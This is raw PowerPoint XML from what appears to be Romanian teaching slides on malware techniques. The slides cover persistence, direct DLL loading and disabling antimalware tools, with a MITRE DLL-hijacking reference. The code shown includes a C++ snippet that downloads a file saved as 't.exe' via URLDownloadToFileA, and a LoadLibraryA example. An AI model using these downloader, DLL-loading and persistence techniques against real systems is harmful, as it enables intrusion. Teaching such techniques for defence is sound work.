              <a:t>const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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>char</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filePath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a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"t.exe"</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 Descărcare folosind URLDownloadToFileA</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HRESULT hr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URLDownloadToFileA</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NULL</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url</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filePath</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a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0</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NULL</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if</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SUCCEEDED</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hr</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std</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cout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&lt;&lt;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a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"Fișier descărcat "</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&lt;&lt;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filePath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&lt;&lt;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std</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endl</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else</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std</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cerr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&lt;&lt;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a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"Eroare la descărcare: "</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&lt;&lt;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hr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&lt;&lt;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std</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endl</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return</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a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0</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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7447510" y="1346624"/>
            <a:ext cx="4246419" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g++ -o descarcare_fisier.exe d.cpp -lurlmon</a:t>
            </a:r>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09868" y="2314149"/>
            <a:ext cx="5031288" cy="4034435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Process 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7519240" y="3370434"/>
            <a:ext cx="3869017" cy="144339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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B01D8C-6A10-99C6-8419-90757D9AC9CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138545" y="2069244"/>
            <a:ext cx="86005" cy="4525294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D614E">
              <a:alpha val="52000"/>
            </a:srgb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solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32610210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lowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>persistenta</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1193" y="2089429"/>
            <a:ext cx="6968276" cy="4477626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D1A190-211C-39DC-3897-45A5D829253F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727000" y="3859399"/>
            <a:ext cx="7793573" cy="823601"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Bent 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF839D09-4301-109E-FA4D-86EE9BB03730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1209124" y="3615996"/>
            <a:ext cx="1586975" cy="2354053"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="366658">
              <a:alpha val="8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6758278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lowchart: Process 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455676" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>persistenta</a:t>
            </a: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47531" y="2387444"/>
            <a:ext cx="4520457" cy="3624815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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87299" y="2657149"/>
            <a:ext cx="5257170" cy="3045632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE57894F-2C5D-45F6-A7E5-B4FEB2524340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5684641" y="2069244"/>
            <a:ext cx="86005" cy="4525294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D614E">
              <a:alpha val="71000"/>
            </a:srgb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solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="530187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977038" y="1625165"/>
            <a:ext cx="9755187" cy="2766528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.13.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Anihilarea programelor antimalware</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19439483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persistenta</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64991" y="4488837"/>
            <a:ext cx="8124147" cy="1850853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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5424" y="2189873"/>
            <a:ext cx="3995398" cy="2848790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flowchart: Process 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7235715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Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Incarcare directa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792480" y="2080482"/>
            <a:ext cx="6096000" cy="4208844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;Windows.h&gt;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804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt;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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>void</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LoadCustomDLL</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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>const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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>char</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dll_path</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 Încărcare DLL specificat de utilizator</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HMODULE hModule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LoadLibraryA</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dll_path</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if</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hModule</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printf</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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"DLL a fost încărcat cu succes: %s\n"</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dll_path</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 Opriți și eliberați biblioteca</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FreeLibrary</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hModule</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else</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printf</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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"Nu s-a putut încărca DLL: %s\n"</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dll_path</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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int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main</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 Calea către fișierul DLL care trebuie încărcat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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>const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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>char</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dll_path </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a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"C:\\Path\\to\\your\\DLL.dll"</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LoadCustomDLL</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dll_path</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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a: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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174089" y="2311414"/>
            <a:ext cx="5373045" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Acest exemplu simplu demonstrează încărcarea unui DLL specificat de utilizator utilizând LoadLibraryA. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Dacă încărcarea reușește, funcția FreeLibrary este folosită pentru a elibera resursele. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Dacă încărcarea nu reușește, se afișează un mesaj de eroare. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Acest tip de cod este util pentru încărcarea dinamică a bibliotecilor, dar poate fi exploatat în atacurile de tip DLL-hijacking, de aceea este important să se asigure validitatea și integritatea cailor de fișiere DLL utilizate în aplicații.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E6FAD5-BF3C-3850-3F59-F766E75231AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5987243" y="2069244"/>
            <a:ext cx="86005" cy="4525294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D614E">
              <a:alpha val="58000"/>
            </a:srgb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solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38936892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Informatii suplimentare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2180497"/>
            <a:ext cx="11029615" cy="574896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1574/001/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="965241" y="2921230"/>
            <a:ext cx="7995879" cy="1597887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="965241" y="4728210"/>
            <a:ext cx="7468934" cy="1509360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50681865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lowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6650735" y="1956816"/>
            <a:ext cx="5110048" cy="1840992"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">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6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1956816"/>
            <a:ext cx="5949696" cy="4742688"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">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2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bibliografie / resurse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434888" y="2588928"/>
            <a:ext cx="5831800" cy="3678303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Paul A. Gagniuc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Antivirus Engines: From Methods to Innovations, Design, and Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. Cambridge, MA: Elsevier Syngress, 2024. pp. 1-656.</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An Introduction to Programming Languages: Simultaneous Learning in Multiple Coding Environments. Synthesis Lectures on Computer Science</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. Springer International Publishing, 2023, pp. 1-280.</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Coding Examples from Simple to Complex - Applications in MATLAB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, Springer, 2024, pp. 1-255.</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Coding Examples from Simple to Complex - Applications in Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
